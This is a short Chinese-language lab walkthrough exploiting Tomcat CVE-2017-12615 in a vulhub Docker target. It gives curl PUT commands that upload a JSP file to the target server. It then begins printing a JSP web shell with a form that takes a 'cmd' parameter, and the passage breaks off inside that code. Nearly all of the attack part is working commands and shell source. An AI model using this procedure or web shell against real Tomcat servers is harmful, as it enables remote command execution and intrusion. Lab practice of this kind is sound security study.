1.搭建漏洞环境 参考github https://github.com/vulhub/vulhub.git 本文使用文件 vulhub/tomcat/CVE-2017-12615
使用docker-compose 运行靶机
2.执行PUT方法上传木马
#-d 指定内容
curl -v -X PUT -d "younglinuxer" 192.168.123.38:8080/1.jsp/
# -F "file=@{FILE_NAME}" 指定上传文件
curl -v -X PUT -F "file=@yuan.jsp" 192.168.123.38:8080/1.jsp/
3.上传木马文件yuan.jsp 此段代码为网上截取一段jsp代码 删除原来使用的cmd.exe 解析器(靶机为Linux)
<%@ page import="java.util.*,java.io.*,java.net.*"%>
<%
%>
<HTML><BODY>
<FORM METHOD="POST" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {